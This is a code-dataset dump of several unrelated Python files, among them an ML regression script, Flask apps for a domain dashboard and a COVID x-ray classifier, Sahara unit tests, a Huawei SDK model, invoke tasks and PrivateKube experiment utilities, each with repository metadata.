\end{tabular}
"""
# Imports
from __future__ import print_function, division, unicode_literals
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pickle
import bootstrap_utils as bu
from sklearn.model_selection import GridSearchCV, ShuffleSplit, train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import LinearRegression, Ridge
from sklearn import preprocessing
#Typical plot parameters that make for pretty plots
mpl.rcParams['figure.figsize'] = (9,8)
mpl.rcParams['font.size'] = 20.0
mpl.rc('font',**{'family':'serif','serif':['Computer Modern']})
mpl.rc('text', usetex=True)
# Flags to control functionality
show_plots = False
save_models = True
# Constants
seed = 42 # RNG seed
test_frac = 0.2
val_frac = 0.2 # Fraction of training data to use as validation for training hyperparams
n_alpha = 50 # Size of alpha grid search for ridge
k = 5 # number of folds for cross validation
# Locations of caches, data
data_loc = "../Data"
phys_cache = "proc_physical_3sig.pkl"
phys_poly_cache = "proc_physical_poly_3sig.pkl"
phys_model_cache = "proc_physical_model.pkl"
cache_loc = "/astro/store/gradscratch/tmp/dflemin3/ML_Data"
plot_loc = "../Plots"
################################################################
#
# Load dataframe from cache, exploratory data analysis
#
################################################################
# Load physical data
if os.path.exists(os.path.join(data_loc,phys_cache)):
print("Reading data from cache:",phys_cache)
with open(os.path.join(data_loc,phys_cache), 'rb') as handle:
X, y, names = pickle.load(handle)
else:
raise NameError("%s not defined." % phys_cache)
################################################################
#
# Train, test, compare!
#
################################################################
# Split into training, testing set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = test_frac,
random_state=seed)
# Scale data to 0 mean, 1 std based on training data
scaler = preprocessing.StandardScaler().fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
# Make list of model defaults
models = [LinearRegression(),
Ridge(random_state=seed),
RandomForestRegressor(random_state=seed)
]
# Do we need to train model's hyperparameters?
train_hyper = [False, True, True]
# For cross validation, do k splits with validation on val_frac of training data held out
cv = ShuffleSplit(n_splits=k, test_size=val_frac, random_state=seed)
# List of dicts of params for grid search cross validation
hyper_ranges = [{},
{"alpha":np.logspace(-10,1,n_alpha)},
{"max_depth":[2,4,6,8,10,None]}
]
# Containers for error/loss metrics
train_r2 = []
train_mse = []
test_r2 = []
test_mse = []
# Loop over models!
for ii in range(len(models)):
# If you need to train hyper parameters
if train_hyper[ii]:
print("Training hyperparameters and fitting:",models[ii])
# Run grid search on subset of training data, overwrite model with best fit
# using k fold cross validation
grid = GridSearchCV(models[ii], param_grid=hyper_ranges[ii], cv=cv)
# Now refit over entire training set with best hyperparameters
models[ii] = grid.fit(X_train, y_train).best_estimator_
print(models[ii])
# Save training R^2, MSE for train, test set
# Train
y_hat_train = models[ii].predict(X_train)
train_mse.append(mean_squared_error(y_train, y_hat_train))
train_r2.append(models[ii].score(X_train, y_train))
# Test
y_hat_test = models[ii].predict(X_test)
test_mse.append(mean_squared_error(y_test, y_hat_test))
test_r2.append(models[ii].score(X_test, y_test))
# No hyperparameters, just fit on training data!
else:
print("Fitting:",models[ii])
models[ii].fit(X_train, y_train)
# Save training R^2, MSE for train, test set
# Train
y_hat_train = models[ii].predict(X_train)
train_mse.append(mean_squared_error(y_train, y_hat_train))
train_r2.append(models[ii].score(X_train, y_train))
# Test
y_hat_test = models[ii].predict(X_test)
test_mse.append(mean_squared_error(y_test, y_hat_test))
test_r2.append(models[ii].score(X_test, y_test))
print("Training, testing r^2:")
print(train_r2,test_r2)
print("Training, testing MSE:")
print(train_mse,test_mse)
# Save models?
if save_models and not os.path.exists(os.path.join(cache_loc,phys_model_cache)):
# Pickle the data to use with bootstrapping
print("Caching data at %s" % os.path.join(cache_loc,phys_model_cache))
with open(os.path.join(cache_loc,phys_model_cache), 'wb') as handle:
pickle.dump(models, handle)
################################################################
#
# Perform bootstrapping using best models for non-ensemble
# estimators.
#
################################################################
# Specify bootstrapping parameters
nboots = 100
# Extract fitted linear models
lr = models[0]
rr = models[1]
# Bootstrap!
print("Bootstrapping...")
ols_mean, ols_std = bu.bootstrap_error_estimate_test(lr, X_train, y_train, X_test, nboots=nboots, seed=seed)
rr_mean, rr_std = bu.bootstrap_error_estimate_test(rr, X_train, y_train, X_test, nboots=nboots, seed=seed)
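# Illustrative sketch (an addition; bootstrap_utils' real implementation may
# differ): one common way to estimate per-point predictive spread is to refit
# the estimator on training sets resampled with replacement and collect the
# standard deviation of the resulting test-set predictions. The helper below
# is a minimal, hypothetical version of that idea and is not called here.
def _bootstrap_std_sketch(make_estimator, X_tr, y_tr, X_te, nboots=100, seed=42):
    rng = np.random.RandomState(seed)
    boot_preds = np.empty((nboots, X_te.shape[0]))
    for b in range(nboots):
        # Resample training rows with replacement, refit, and predict on the test set
        idx = rng.randint(0, X_tr.shape[0], size=X_tr.shape[0])
        boot_preds[b] = make_estimator().fit(X_tr[idx], y_tr[idx]).predict(X_te)
    return boot_preds.mean(axis=0), boot_preds.std(axis=0)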
# Save to latex style table
data = [['OLS',train_mse[0], test_mse[0], train_r2[0], test_r2[0], np.median(ols_std)],
['RR',train_mse[1], test_mse[1], train_r2[1], test_r2[1], np.median(rr_std)],
['RF',train_mse[2], test_mse[2], train_r2[2], test_r2[2], 0.0]]
col_names = ['est','training MSE','testing MSE', r'training R^2', r'testing R^2', r"Median Std"]
table = pd.DataFrame(data=data, columns=col_names)
print(table.to_latex())
################################################################
#
# Visualize bootstrapping results
#
################################################################
if show_plots:
# See how ridge regression bootstrapping performs
fig, ax = plt.subplots()
xind = names["b_Inc"]
yind = names["c_Inc"]
cax = ax.scatter(X[:,xind],X[:,yind], c=rr_std, edgecolor="none", cmap="viridis")
cbar = fig.colorbar(cax)
cbar.set_label("Standard Deviation",rotation=270,labelpad=20)
# Format
ax.set_xlim(X[:,xind].min(),X[:,xind].max())
ax.set_ylim(X[:,yind].min(),X[:,yind].max())
ax.set_xlabel("b Inclination [degrees]")
ax.set_ylabel("c Inclination [degrees]")
#fig.tight_layout()
#fig.savefig(os.path.join(plot_loc,"rr_inc_inc.pdf"))
plt.show()
| 32.908333
| 118
| 0.651051
|
31fd6f5429493d2c5793e577a2d076b76c9e52e7
| 540
|
py
|
Python
|
python/restartNetflix7.py
|
SheffieldML/collab
|
463d1cdb5bd0a6b8d39e0046afcacb17653cded8
|
[
"BSD-3-Clause"
] | 27
|
2015-05-12T13:28:22.000Z
|
2021-05-09T18:55:07.000Z
|
python/restartNetflix7.py
|
afcarl/collab
|
463d1cdb5bd0a6b8d39e0046afcacb17653cded8
|
[
"BSD-3-Clause"
] | 1
|
2015-04-11T18:40:31.000Z
|
2015-06-02T20:04:40.000Z
|
python/restartNetflix7.py
|
afcarl/collab
|
463d1cdb5bd0a6b8d39e0046afcacb17653cded8
|
[
"BSD-3-Clause"
] | 11
|
2015-04-11T18:38:28.000Z
|
2020-03-17T02:42:06.000Z
|
#!/usr/bin/env python
# Try collaborative filtering on the netflix data.
import collab
import ndlml as nl
opt = collab.options()
opt.resultsBaseDir = "/local/data/results/netflix/"
try:
collab.restart(loadIter = 5,
startCount = 2620000,
loadUser = 2190625,
latentDim = 7,
dataSetName = 'netflix',
experimentNo = 7,
options=opt)
except:
import pdb, sys
e, m, tb = sys.exc_info()
pdb.post_mortem(tb)
| 23.478261
| 51
| 0.548148
|
7a3764d3ad9643ce717b6614f0ab585bdeee587b
| 3,620
|
py
|
Python
|
web/datatrace_web/index.py
|
pensnarik/domains-database
|
b42d8b6e4e249eba50e3e441fdae98aeedcbeb03
|
[
"MIT"
] | 1
|
2020-03-24T23:57:59.000Z
|
2020-03-24T23:57:59.000Z
|
web/datatrace_web/index.py
|
pensnarik/domains-database
|
b42d8b6e4e249eba50e3e441fdae98aeedcbeb03
|
[
"MIT"
] | 3
|
2020-01-30T13:40:37.000Z
|
2020-01-31T11:08:52.000Z
|
web/datatrace_web/index.py
|
pensnarik/domains-database
|
b42d8b6e4e249eba50e3e441fdae98aeedcbeb03
|
[
"MIT"
] | null | null | null |
import json
import datetime as dt
from flask import render_template, g, request
from datatrace_web import app, sql
import calendar, pytz
def get_hosts():
query = '''
select distinct hostname
from session
where end_time is null
and instance is not null
order by 1
'''
return [i['hostname'] for i in sql.get_rows(query)]
@app.route('/', methods=['GET'])
def index():
tz = pytz.timezone('CET')
default_intervals = {
'h': [dt.date.today().strftime('%Y-%m-%d 00:00'),
(dt.date.today() + dt.timedelta(days=1)).strftime('%Y-%m-%d 00:00')],
'm': [(dt.datetime.now().astimezone(tz) - dt.timedelta(hours=1)).strftime('%Y-%m-%d %H:%M'),
dt.datetime.now().astimezone(tz).strftime('%Y-%m-%d %H:%M')]
}
host = request.args.get('host')
interval = request.args.get('interval', 'm')
date_from = request.args.get('date_from')
date_till = request.args.get('date_till')
if date_from is None or date_till is None:
date_from, date_till = default_intervals[interval]
if host == '':
host = None
stat = sql.get_rows("select * from report.stat(%s, %s, %s, %s)", (date_from, date_till, host, interval,))
hosts_stat = sql.get_rows("select * from report.hosts_stat(%s, %s, %s)", (date_from, date_till, interval, ))
status_stat = sql.get_rows("select * from report.status_log(%s, %s, %s, %s)", (date_from, date_till, host, interval, ))
hosts_data = dict()
hosts_data_avg = dict()
status_data = {'ok': list(), 'timeout': list(), 'connection_error': list(),
'too_many_redirects': list(), 'unknown_error': list(),
'too_large': list(), 'resolve_error': list()}
for row in hosts_stat:
if row['host'] in hosts_data.keys():
hosts_data[row['host']].append({'Timestamp': row['date_time'].strftime('%Y-%m-%dT%H:%M%Z'), 'Value': row['parsed_sites']})
hosts_data_avg[row['host']].append({'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': str(row['avg_total'])})
else:
hosts_data[row['host']] = [{'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': row['parsed_sites']}]
hosts_data_avg[row['host']] = [{'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': str(row['avg_total'])}]
for row in status_stat:
for status in status_data.keys():
status_data[status].append({'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': row['num_%s' % status]})
return render_template('index.html', stat=stat, host=host, interval=interval, hosts=get_hosts(),
date_from=date_from, date_till=date_till, hosts_data=json.dumps(hosts_data),
hosts_data_avg=hosts_data_avg, status_data=json.dumps(status_data))
@app.route('/search', methods=['GET'])
def search():
domain = request.args.get('domain')
ip = request.args.get('ip')
phone = request.args.get('phone')
last_domain = request.args.get('last_domain')
if domain == '':
domain = None
if ip == '':
ip = None
if last_domain == '':
last_domain = None
if phone == '':
phone = None
query = '''
select * from public.search(%s, %s, %s, %s)
'''
result = sql.get_rows(query, (domain, ip, phone, last_domain,))
last_domain = result[-1]['domain'] if len(result) > 0 else None
return render_template('search.html', result=result, domain=domain, ip=ip, phone=phone,
last_domain=last_domain)
| 39.347826
| 140
| 0.595856
|
6ba1b986ec48c5c8dc6e716ac78122c1b97d5173
| 6,644
|
py
|
Python
|
sahara/tests/unit/service/test_periodic.py
|
redhat-openstack/sahara
|
67165c96eceb1ce3b087870934d394602f5dd959
|
[
"Apache-2.0"
] | null | null | null |
sahara/tests/unit/service/test_periodic.py
|
redhat-openstack/sahara
|
67165c96eceb1ce3b087870934d394602f5dd959
|
[
"Apache-2.0"
] | null | null | null |
sahara/tests/unit/service/test_periodic.py
|
redhat-openstack/sahara
|
67165c96eceb1ce3b087870934d394602f5dd959
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import mock
from oslo_utils import timeutils
from sahara.conductor import manager
from sahara import context
import sahara.service.periodic as p
import sahara.tests.unit.base as base
from sahara.tests.unit.conductor.manager import test_clusters as tc
from sahara.tests.unit.conductor.manager import test_edp as te
class TestPeriodicBack(base.SaharaWithDbTestCase):
def setUp(self):
super(TestPeriodicBack, self).setUp()
self.api = manager.ConductorManager()
@mock.patch('sahara.service.edp.job_manager.get_job_status')
def test_job_status_update(self, get_job_status):
ctx = context.ctx()
job = self.api.job_create(ctx, te.SAMPLE_JOB)
ds = self.api.data_source_create(ctx, te.SAMPLE_DATA_SOURCE)
self._create_job_execution({"end_time": datetime.datetime.now(),
"id": 1},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 2},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 3},
job, ds, ds)
p._make_periodic_tasks().update_job_statuses(None)
self.assertEqual(2, get_job_status.call_count)
get_job_status.assert_has_calls([mock.call(u'2'),
mock.call(u'3')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_transient_cluster_terminate(self, terminate_cluster):
timeutils.set_time_override(datetime.datetime(2005, 2, 1, 0, 0))
ctx = context.ctx()
job = self.api.job_create(ctx, te.SAMPLE_JOB)
ds = self.api.data_source_create(ctx, te.SAMPLE_DATA_SOURCE)
self._make_cluster('1')
self._make_cluster('2')
self._create_job_execution({"end_time": timeutils.utcnow(),
"id": 1,
"cluster_id": "1"},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 2,
"cluster_id": "2"},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 3,
"cluster_id": "2"},
job, ds, ds)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, 0, 1))
p._make_periodic_tasks().terminate_unneeded_transient_clusters(None)
self.assertEqual(1, terminate_cluster.call_count)
terminate_cluster.assert_has_calls([mock.call(u'1')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_transient_cluster_not_killed_too_early(self, terminate_cluster):
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1')
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=20))
p._make_periodic_tasks().terminate_unneeded_transient_clusters(None)
self.assertEqual(0, terminate_cluster.call_count)
@mock.patch('sahara.service.ops.terminate_cluster')
def test_transient_cluster_killed_in_time(self, terminate_cluster):
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1')
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=40))
p._make_periodic_tasks().terminate_unneeded_transient_clusters(None)
self.assertEqual(1, terminate_cluster.call_count)
terminate_cluster.assert_has_calls([mock.call(u'1')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_incomplete_cluster_not_killed_too_early(self, terminate_cluster):
self.override_config('cleanup_time_for_incomplete_clusters', 1)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1', status='Pending')
timeutils.set_time_override(datetime.datetime(
2005, 2, 1, minute=59, second=50))
p._make_periodic_tasks().terminate_incomplete_clusters(None)
self.assertEqual(0, terminate_cluster.call_count)
@mock.patch('sahara.service.ops.terminate_cluster')
def test_incomplete_cluster_killed_in_time(self, terminate_cluster):
self.override_config('cleanup_time_for_incomplete_clusters', 1)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1', status='Pending')
timeutils.set_time_override(datetime.datetime(
2005, 2, 1, hour=1, second=10))
p._make_periodic_tasks().terminate_incomplete_clusters(None)
self.assertEqual(1, terminate_cluster.call_count)
terminate_cluster.assert_has_calls([mock.call(u'1')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_active_cluster_not_killed_as_inactive(
self, terminate_cluster):
self.override_config('cleanup_time_for_incomplete_clusters', 1)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1')
timeutils.set_time_override(datetime.datetime(
2005, 2, 1, hour=1, second=10))
p._make_periodic_tasks().terminate_incomplete_clusters(None)
self.assertEqual(0, terminate_cluster.call_count)
def _make_cluster(self, id_name, status='Active'):
ctx = context.ctx()
c = tc.SAMPLE_CLUSTER.copy()
c["status"] = status
c["id"] = id_name
c["name"] = id_name
c['updated_at'] = timeutils.utcnow()
self.api.cluster_create(ctx, c)
def _create_job_execution(self, values, job, input, output):
values.update({"job_id": job['id'],
"input_id": input['id'],
"output_id": output['id']})
self.api.job_execution_create(context.ctx(), values)
| 39.082353
| 78
| 0.642234
|
7fe8fc96dc1f05826dd15e47e87b19bc8e6af630
| 2,865
|
py
|
Python
|
huaweicloud-sdk-as/huaweicloudsdkas/v1/model/show_api_version_response.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 1
|
2021-11-03T07:54:50.000Z
|
2021-11-03T07:54:50.000Z
|
huaweicloud-sdk-as/huaweicloudsdkas/v1/model/show_api_version_response.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | null | null | null |
huaweicloud-sdk-as/huaweicloudsdkas/v1/model/show_api_version_response.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowApiVersionResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'version': 'VersionInfo'
}
attribute_map = {
'version': 'version'
}
def __init__(self, version=None):
"""ShowApiVersionResponse - a model defined in huaweicloud sdk"""
super(ShowApiVersionResponse, self).__init__()
self._version = None
self.discriminator = None
if version is not None:
self.version = version
@property
def version(self):
"""Gets the version of this ShowApiVersionResponse.
:return: The version of this ShowApiVersionResponse.
:rtype: VersionInfo
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ShowApiVersionResponse.
:param version: The version of this ShowApiVersionResponse.
:type: VersionInfo
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowApiVersionResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
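# Illustrative usage sketch (an addition): in normal SDK use this response model
# is returned by the client call rather than built by hand; the lines below are
# a hypothetical, minimal illustration and are left commented out.
# resp = ShowApiVersionResponse()
# resp.version = version_info          # a VersionInfo instance from this SDK
# print(resp.to_str())                 # pretty-printed dict form of the response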
| 26.284404
| 74
| 0.55288
|
406e8473f7886aab1e70576ceb1a85774f9aa63b
| 3,290
|
py
|
Python
|
tasks.py
|
romnn/lsde2021
|
6730b50434c320e60b2d7e14e3dfdce25be87323
|
[
"MIT"
] | null | null | null |
tasks.py
|
romnn/lsde2021
|
6730b50434c320e60b2d7e14e3dfdce25be87323
|
[
"MIT"
] | null | null | null |
tasks.py
|
romnn/lsde2021
|
6730b50434c320e60b2d7e14e3dfdce25be87323
|
[
"MIT"
] | null | null | null |
"""
Tasks for maintaining the project.
Execute 'invoke --list' for guidance on using Invoke
"""
import shutil
import pprint
from invoke import task
import webbrowser
from pathlib import Path
Path().expanduser()
ROOT_DIR = Path(__file__).parent
SETUP_FILE = ROOT_DIR.joinpath("setup.py")
TEST_DIR = ROOT_DIR.joinpath("tests")
SOURCE_DIR = ROOT_DIR.joinpath("lsde2021")
TOX_DIR = ROOT_DIR.joinpath(".tox")
COVERAGE_FILE = ROOT_DIR.joinpath(".coverage")
COVERAGE_DIR = ROOT_DIR.joinpath("htmlcov")
COVERAGE_REPORT = COVERAGE_DIR.joinpath("index.html")
PYTHON_DIRS = [str(d) for d in [SOURCE_DIR, TEST_DIR]]
def _delete_file(file):
try:
file.unlink(missing_ok=True)
except TypeError:
# missing_ok argument added in 3.8
try:
file.unlink()
except FileNotFoundError:
pass
@task(help={"check": "Checks if source is formatted without applying changes"})
def format(c, check=False):
"""Format code"""
python_dirs_string = " ".join(PYTHON_DIRS)
black_options = "--diff" if check else ""
c.run("pipenv run black {} {}".format(black_options, python_dirs_string))
isort_options = "{}".format("--check-only" if check else "")
c.run("pipenv run isort {} {}".format(isort_options, python_dirs_string))
@task
def lint(c):
"""Lint code"""
c.run("pipenv run flake8 {}".format(SOURCE_DIR))
@task
def test(c, min_coverage=None, parallel=True, verbose=True):
"""Run tests"""
cov_options = "--cov-fail-under={}".format(min_coverage) if min_coverage else ""
parallel_options = "-n auto" if parallel else ""
verbose_options = "-vv" if verbose else ""
c.run(
"pipenv run pytest --cov={} {} {} {}".format(
SOURCE_DIR, parallel_options, verbose_options, cov_options
)
)
@task
def type_check(c):
"""Check types"""
c.run("pipenv run mypy")
@task
def install_hooks(c):
"""Install pre-commit hooks"""
c.run("pipenv run pre-commit install -t pre-commit")
c.run("pipenv run pre-commit install -t pre-push")
@task
def pre_commit(c):
"""Run all pre-commit checks"""
c.run("pipenv run pre-commit run --all-files")
@task
def clean_build(c):
"""Clean up files from package building"""
c.run("rm -fr build/")
c.run("rm -fr dist/")
c.run("rm -fr .eggs/")
c.run("find . -name '*.egg-info' -exec rm -fr {} +")
c.run("find . -name '*.egg' -exec rm -f {} +")
@task
def clean_python(c):
"""Clean up python file artifacts"""
c.run("find . -name '*.pyc' -exec rm -f {} +")
c.run("find . -name '*.pyo' -exec rm -f {} +")
c.run("find . -name '*~' -exec rm -f {} +")
c.run("find . -name '__pycache__' -exec rm -fr {} +")
@task
def clean_tests(c):
"""Clean up files from testing"""
_delete_file(COVERAGE_FILE)
shutil.rmtree(TOX_DIR, ignore_errors=True)
shutil.rmtree(COVERAGE_DIR, ignore_errors=True)
@task(pre=[clean_build, clean_python, clean_tests])
def clean(c):
"""Runs all clean sub-tasks"""
pass
@task(clean)
def dist(c):
"""Build source and wheel packages"""
c.run("python setup.py sdist")
c.run("python setup.py bdist_wheel")
@task()
def requirements(c):
"""Lock and write out the requirements"""
c.run("pipenv lock -r > requirements.txt")
| 25.503876
| 84
| 0.643465
|
78269c5eb93e6a5af65d2d40098c3aa88911827e
| 2,025
|
py
|
Python
|
app.py
|
sambezalel/flask-covid-19
|
44c6b03874591a32de5f5c2168dcdea227283657
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
sambezalel/flask-covid-19
|
44c6b03874591a32de5f5c2168dcdea227283657
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
sambezalel/flask-covid-19
|
44c6b03874591a32de5f5c2168dcdea227283657
|
[
"Apache-2.0"
] | null | null | null |
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
import numpy as np
from flask import Flask, redirect, templating, url_for, request, render_template
import os
# from werkzeug.utils import HTMLBuilder  # unused, and removed in modern Werkzeug
#from werkzeug import secure_filename
app = Flask(__name__)
@app.route('/report/<name>')
def report(name):
# dimensions of our images
img_width, img_height = 224, 224
# load the model we saved
model = load_model('keras.h5')
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
# predicting images
#img = image.load_img(name).convert('L')
#img = img.resize(img_height, img_width)
img = image.load_img(name, target_size=(img_width, img_height))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
images = np.vstack([x])
classes = model.predict_classes(images, batch_size=10)
if classes[0][0] == 1:
return render_template("negative.html")
else:
return render_template("positive.html")
@app.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'POST':
file = request.files['nm']
basepath = os.path.dirname(__file__)
#file.save(os.path.join(basepath, "uploads", file.filename))
#user = os.path.join(basepath, "uploads", file.filename)
file.save(os.path.join(basepath, file.filename))
user = file.filename
return redirect(url_for('report', name=user))
else:
user = request.args.get('nm')
return redirect(url_for('report', name=user))
@app.route("/")
def home_view():
return render_template("index.html")
@app.route("/app")
def app_view():
return render_template("app.html")
@app.route("/negative")
def negative_view():
return render_template("negative.html")
@app.route("/positive")
def positive_view():
return render_template("positive.html")
if __name__ == '__main__':
app.run(debug=True)
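# Illustrative sketch (an addition, not part of the original app): reloading the
# Keras model inside report() on every request is expensive. A common pattern is
# to load it once at import time and reuse it, e.g.:
#
#   MODEL = load_model('keras.h5')
#
#   def predict_image(path, size=(224, 224)):
#       img = image.load_img(path, target_size=size)
#       x = np.expand_dims(image.img_to_array(img), axis=0)
#       return MODEL.predict(x)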
| 27.364865
| 80
| 0.665185
|
956265c326e4fffc78aa1e6d5bc1aef4dbff1214
| 5,924
|
py
|
Python
|
privatekube/privatekube/experiments/utils.py
|
DelphianCalamity/PrivateKube
|
14f575e77021ab7baca30f4061140ec83bdc96a7
|
[
"Apache-2.0"
] | 9
|
2021-06-16T00:22:45.000Z
|
2021-11-25T07:19:11.000Z
|
privatekube/privatekube/experiments/utils.py
|
DelphianCalamity/PrivateKube
|
14f575e77021ab7baca30f4061140ec83bdc96a7
|
[
"Apache-2.0"
] | 2
|
2021-11-14T10:42:43.000Z
|
2022-03-16T03:43:22.000Z
|
privatekube/privatekube/experiments/utils.py
|
DelphianCalamity/PrivateKube
|
14f575e77021ab7baca30f4061140ec83bdc96a7
|
[
"Apache-2.0"
] | 3
|
2021-04-08T08:08:48.000Z
|
2021-12-24T01:42:20.000Z
|
from absl import flags, logging
import yaml
import json
import os
import pandas as pd
import time
import torch
import numpy as np
import gcsfs
FLAGS = flags.FLAGS
GCP_PROJECT = "project-id-1234"
def build_flags(*arg_dicts):
"""
Declares Absl flags from a dictionary.
Flags are associated with this privatekube module, but shared with everyone.
"""
for arg_dict in arg_dicts:
for arg_name, default_value in arg_dict.items():
if type(default_value) == bool:
flags.DEFINE_bool(arg_name, default_value, arg_name)
if type(default_value) == int:
flags.DEFINE_integer(arg_name, default_value, arg_name)
if type(default_value) == float:
flags.DEFINE_float(arg_name, default_value, arg_name)
if type(default_value) == str:
flags.DEFINE_string(arg_name, default_value, arg_name)
def flags_to_dict(*arg_dicts):
"""
Returns a dict with the value of the flags we care about.
"""
result = {}
for arg_dict in arg_dicts:
for arg_name in arg_dict.keys():
result[arg_name] = getattr(FLAGS, arg_name)
return result
def results_to_dict(
train_size=None,
test_size=None,
dataset_files=None,
training_time=None,
epsilon=None,
delta=None,
mse=None,
rmse=None,
rmsle=None,
accuracy=None,
loss=None,
):
dict_results = {
"train_size": train_size,
"test_size": test_size,
"dataset_files": dataset_files,
"training_time": training_time,
"epsilon": epsilon,
"delta": delta,
"mse": mse,
"rmse": rmse,
"rmsle": rmsle,
"accuracy": accuracy,
}
return dict_results
def save_model(model_path, model):
model_dir = os.path.dirname(model_path)
if not os.path.exists(model_dir) and model_dir != "":
os.makedirs(model_dir)
logging.debug(f"Created directory: {model_dir}.")
torch.save(model.state_dict(), model_path)
def save_yaml(yaml_path, dict_results):
yaml_dir = os.path.dirname(yaml_path)
if not os.path.exists(yaml_dir) and yaml_dir != "":
os.makedirs(yaml_dir)
logging.debug(f"Created directory: {yaml_dir}.")
with open(yaml_path, "w") as f:
yaml.dump(dict_results, f)
logging.debug(f"Wrote yaml: {yaml_path}")
def raw_flags_to_dict(flags):
d = {}
for attr, flag_obj in flags.__flags.items():
d[attr] = flag_obj.value
return d
def load_yaml(yaml_path):
with open(yaml_path, "r") as f:
configs = yaml.safe_load(f)
return configs
def dicts_to_df(dict_list):
"""Concatenates a list of dictionaries with similar keys into a dataframe"""
all_keys = set()
for r in dict_list:
all_keys.update(r.keys())
data = {}
for key in all_keys:
data[key] = []
for d in dict_list:
for key in all_keys:
if key in d:
data[key].append(d[key])
else:
data[key].append(None)
df = pd.DataFrame(data=data)
return df
def save_results_to_yaml(
log_dir,
train_size,
test_size,
dataset_files,
training_time=None,
epsilon=None,
delta=None,
mse=None,
rmse=None,
rmsle=None,
accuracy=None,
loss=None,
):
dict_results = {
"train_size": train_size,
"test_size": test_size,
"dataset_files": dataset_files,
"training_time": training_time,
"epsilon": epsilon,
"delta": delta,
"mse": mse,
"rmse": rmse,
"rmsle": rmsle,
"accuracy": accuracy,
"timestamp": time.time(),
}
yaml_path = os.path.join(log_dir, "results.yaml")
with open(yaml_path, "w") as f:
yaml.dump(dict_results, f)
print(f"Saved logs to {yaml_path}.")
def yaml_dir_to_df(dir):
all_experiments = None
print(f"Loading {dir}")
if dir[0:5] == "gs://":
fs = gcsfs.GCSFileSystem(project=GCP_PROJECT)
files = list(map(lambda blob: blob["name"], fs.listdir(dir)))
else:
files = os.listdir(dir)
for index, yaml_file in enumerate(filter(lambda f: f.endswith(".yaml"), files)):
if dir[0:5] == "gs://":
with fs.open(yaml_file) as f:
config = yaml.load(f, Loader=yaml.Loader)
else:
with open(os.path.join(dir, yaml_file)) as f:
config = yaml.load(f, Loader=yaml.Loader)
# Pop nested lists that don't fit in the DF
to_pop = []
for key, value in config.items():
if isinstance(value, list):
to_pop.append(key)
for key in to_pop:
config.pop(key, None)
# Transform to dataframe
experiment = pd.DataFrame(config, index=[index])
# workload = pd.DataFrame(config["workload"], index=[index])
# results = pd.DataFrame(config["results"], index=[index])
# experiment = dp.join(workload).join(results)
# Update
if all_experiments is None:
all_experiments = experiment
else:
all_experiments = all_experiments.append(experiment)
return all_experiments
